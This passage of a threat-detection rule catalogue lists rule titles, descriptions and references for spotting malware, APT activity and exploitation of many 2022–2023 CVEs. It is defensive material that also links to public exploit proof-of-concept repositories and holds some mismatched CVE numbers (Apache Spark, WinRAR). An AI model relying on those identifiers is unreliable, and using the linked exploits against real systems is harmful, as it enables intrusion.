https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 |
Pingback Backdoor Activity |
Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 |
Small Sieve Malware File Indicator Creation |
Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
Small Sieve Malware CommandLine Indicator |
Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
Small Sieve Malware Potential C2 Communication |
Detects potential C2 communication related to Small Sieve malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Small Sieve Malware Registry Persistence |
Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
HAFNIUM Exchange Exploitation Activity |
Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers |
https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3, https://twitter.com/GadixCRK/status/1369313704869834753?s=20, https://twitter.com/BleepinComputer/status/1372218235949617161 |
Exchange Exploitation Used by HAFNIUM |
Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity |
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
REvil Kaseya Incident Malware Patterns |
Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) |
https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers, https://www.joesandbox.com/analysis/443736/0/html, https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b, https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/, https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/ |
APT PRIVATELOG Image Load Pattern |
Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances |
https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html |
SOURGUM Actor Behaviours |
Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM |
https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection, https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml, https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ |
DEWMODE Webshell Access |
Detects access to DEWMODE webshell as described in FIREEYE report |
https://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion |
Potential CVE-2023-21554 QueueJumper Exploitation |
Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) |
https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/ |
Potential CVE-2022-21587 Exploitation Attempt |
Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution. |
https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/, https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis, https://github.com/hieuminhnv/CVE-2022-21587-POC, https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ |
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution |
Detects potential exploitation attempts of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, as part of the attack chain, threat actors used PowerShell commands that executed as child processes of the legitimate Tomcat "prunsrv.exe" process. |
https://blog.morphisec.com/vmware-identity-manager-attack-backdoor, https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC |
CVE-2022-24527 Microsoft Connected Cache LPE |
Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache |
https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/ |
Potential CVE-2022-26809 Exploitation Attempt |
Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809, https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html, https://twitter.com/cyb3rops/status/1514217991034097664, https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/ |
Zimbra Collaboration Suite Email Server Unauthenticated RCE |
Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection |
https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/, https://www.yang99.top/index.php/archives/82/, https://github.com/vnhacker1337/CVE-2022-27925-PoC |
Potential CVE-2022-29072 Exploitation Attempt |
Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. |
https://github.com/kagancapar/CVE-2022-29072, https://twitter.com/kagancapar/status/1515219358234161153 |
CVE-2022-31659 VMware Workspace ONE Access RCE |
Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659 |
https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd |
Suspicious Set Value of MSDT in Registry (CVE-2022-30190) |
Detects the setting of the ms-msdt MSProtocol URI scheme value in the registry, which could be an attempt to exploit CVE-2022-30190. |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ |
CVE-2022-31656 VMware Workspace ONE Access Auth Bypass |
Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.
A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
|
https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd |
Apache Spark Shell Command Injection - Weblogs |
Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a weblogs perspective |
https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files |
Atlassian Bitbucket Command Injection Via Archive API |
Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804 |
https://twitter.com/_0xf4n9x_/status/1572052954538192901, https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/, https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html, https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/ |
Potential OWASSRF Exploitation Attempt - Proxy |
Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ |
OWASSRF Exploitation Attempt Using Public POC - Proxy |
Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using a publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw |
Potential OWASSRF Exploitation Attempt - Webserver |
Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ |
OWASSRF Exploitation Attempt Using Public POC - Webserver |
Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using a publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw |
Suspicious Sysmon as Execution Parent |
Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120, https://twitter.com/filip_dragovic/status/1590052248260055041, https://twitter.com/filip_dragovic/status/1590104354727436290 |
Exploitation Indicator Of CVE-2022-42475 |
Detects exploitation indicators of CVE-2022-42475, a heap-based buffer overflow in sslvpnd. |
https://www.fortiguard.com/psirt/FG-IR-22-398, https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/, https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/, https://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420 |
Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 |
Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877 |
https://seclists.org/fulldisclosure/2023/Jan/1, https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/ |
Potential CVE-2022-46169 Exploitation Attempt |
Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169 |
https://github.com/0xf4n9x/CVE-2022-46169, https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf, https://github.com/rapid7/metasploit-framework/pull/17407 |
MSSQL Extended Stored Procedure Backdoor Maggie |
This rule detects the execution of the extended stored procedure backdoor named Maggie in the context of Microsoft SQL Server |
https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01 |
BlueSky Ransomware Artefacts |
Detects access to files and shares with names and extensions used by BlueSky ransomware, which could indicate a current or previous encryption attempt. |
https://unit42.paloaltonetworks.com/bluesky-ransomware/ |
Potential Bumblebee Remote Thread Creation |
Detects remote thread injection events based on actions seen used by Bumblebee |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
ChromeLoader Malware Execution |
Detects execution of ChromeLoader malware via a registered scheduled task |
https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER, https://twitter.com/th3_protoCOL/status/1480621526764322817, https://twitter.com/Kostastsale/status/1480716528421011458, https://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd |
Emotet Loader Execution Via .LNK File |
Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
The ".lnk" file was delivered via phishing campaign.
|
https://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338, https://twitter.com/Cryptolaemus1/status/1517634855940632576, https://tria.ge/220422-1pw1pscfdl/, https://tria.ge/220422-1nnmyagdf2/ |
Hermetic Wiper TG Process Patterns |
Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia |
Raspberry Robin Subsequent Execution of Commands |
Detects the subsequent execution of commands by Raspberry Robin. |
https://redcanary.com/blog/raspberry-robin/ |
Raspberry Robin Initial Execution From External Drive |
Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE". |
https://redcanary.com/blog/raspberry-robin/ |
Serpent Backdoor Payload Execution Via Scheduled Task |
Detects a post-exploitation execution technique of the Serpent backdoor.
According to Proofpoint, one of the commands the backdoor ran created a temporary scheduled task using an unusual method.
It creates a fictitious Windows event and a trigger so that, once the event is created, the payload is executed.
|
https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain |
Potential Raspberry Robin Dot Ending File |
Detects a command line containing a reference to files ending with a ".". This scheme has been seen used by Raspberry Robin |
https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ |
Potential ACTINIUM Persistence Activity |
Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. |
https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations |
FakeUpdates/SocGholish Activity |
Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell. |
https://twitter.com/th3_protoCOL/status/1536788652889497600, https://twitter.com/1ZRR4H/status/1537501582727778304 |
MERCURY APT Activity |
Detects suspicious command line patterns seen being used by MERCURY APT |
https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ |
MSMQ Corrupted Packet Encountered |
Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation |
https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ |
CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 |
Detects potential exploitation attempts of CVE-2023-1389, an unauthenticated command injection in TP-Link Archer AX21.
|
https://www.tenable.com/security/research/tra-2023-11, https://github.com/Voyag3r-Security/CVE-2023-1389/blob/4ecada7335b17bf543c0e33b2c9fb6b6215c09ae/archer-rev-shell.py, https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal |
Exploitation Indicators Of CVE-2023-20198 |
Detects exploitation indicators of CVE-2023-20198, a privilege escalation vulnerability in the Cisco IOS XE Software Web UI. |
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z, https://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/ |
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
Potential CVE-2023-2283 Exploitation |
Detects a potential exploitation attempt of CVE-2023-2283, an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. This error message is a sign of an exploitation attempt, not of a successful exploitation. |
https://twitter.com/kevin_backhouse/status/1666459308941357056?s=20, https://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420, https://nvd.nist.gov/vuln/detail/CVE-2023-2283, https://www.blumira.com/cve-2023-2283/, https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283 |
Outlook Task/Note Reminder Received |
Detects changes to the registry values related to Outlook that indicate a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine whether the exploitation succeeded. |
https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ |
CVE-2023-23397 Exploitation Attempt |
Detects Outlook initiating a connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation. |
https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/ |
Potential CVE-2023-23397 Exploitation Attempt - SMB |
Detects (failed) outbound connection attempts to internet-facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397. |
https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ |
Potential CVE-2023-23752 Exploitation Attempt |
Detects a potential exploitation attempt of CVE-2023-23752, an improper access check in web service endpoints in Joomla |
https://xz.aliyun.com/t/12175, https://twitter.com/momika233/status/1626464189261942786 |
Potential CVE-2023-25157 Exploitation Attempt |
Detects a potential exploitation attempt of CVE-2023-25157, a SQL injection in GeoServer |
https://github.com/win3zz/CVE-2023-25157, https://twitter.com/parzel2/status/1665726454489915395, https://github.com/advisories/GHSA-7g5f-wrx8-5ccf |
Potential CVE-2023-25717 Exploitation Attempt |
Detects a potential exploitation attempt of CVE-2023-25717, a remote code execution via an unauthenticated HTTP GET request in Ruckus Wireless Admin |
https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ |
Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader |
Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. |
https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363, https://www.zerodayinitiative.com/advisories/ZDI-23-491/, https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/ |
Potential CVE-2023-27997 Exploitation Indicators |
Detects indicators of potential exploitation of CVE-2023-27997 in Fortigate weblogs.
To avoid false positives, it is best to look for successive requests to the endpoints mentioned as well as unusual values of the "enc" parameter
|
https://blog.lexfo.fr/Forensics-xortigate-notice.html, https://blog.lexfo.fr/xortigate-cve-2023-27997.html, https://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/, https://labs.watchtowr.com/xortigate-or-cve-2023-27997/ |
Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity |
Detects file indicators of potential exploitation of MOVEit CVE-2023-34362. |
https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/, https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/, https://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/ |
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE |
Detects the execution of "csc.exe" via the "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
Hunting Opportunity
Events from IIS dynamically compiling binaries via csc.exe on behalf of the MOVEit application, especially since May 27th, should be investigated.
|
https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response, https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/ |
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request |
Detects GET requests to specific files used during the exploitation of MOVEit CVE-2023-34362 |
https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft |
Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location |
Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. |
https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ |
Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation |
Detects the creation of a file named "wermgr.exe" in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. |
https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ |
Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution |
Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 |
https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ |
Potential CVE-2023-36884 Exploitation Dropped File |
Detects a specific file being created in the Recent folder of Office. These files have been seen being dropped during potential exploitation of CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit, https://twitter.com/wdormann/status/1679184475677130755, https://twitter.com/r00tbsd/status/1679042071477338114/photo/1 |
Potential CVE-2023-36884 Exploitation Pattern |
Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2023-36884 URL Request Pattern Traffic |
Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCom potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2023-36884 Exploitation - File Downloads |
Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2023-36884 Exploitation - URL Marker |
Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2023-36884 Exploitation - Share Access |
Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File |
Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 |
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md |
CVE-2023-40477 Potential Exploitation - .REV File Creation |
Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. |
https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html |
CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process |
Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. |
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md |
CVE-2023-40477 Potential Exploitation - WinRAR Application Crash |
Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477 |
https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html |
Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy |
Detects exploitation attempts, in proxy logs, of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components.
|
https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261 |
Potential Information Disclosure CVE-2023-43261 Exploitation - Web |
Detects exploitation attempts, in access logs, of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components.
|
https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261 |
Potential CVE-2023-46214 Exploitation Attempt |
Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
|
https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104 |
Exploitation Attempt Of CVE-2023-46214 Using Public POC Code |
Detects exploitation attempts of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing, using known public proof of concept code
|
https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104 |
CVE-2023-46747 Exploitation Activity - Proxy |
Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP. |
https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/ |
CVE-2023-46747 Exploitation Activity - Webserver |
Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP. |
https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/ |
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy |
Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string. |
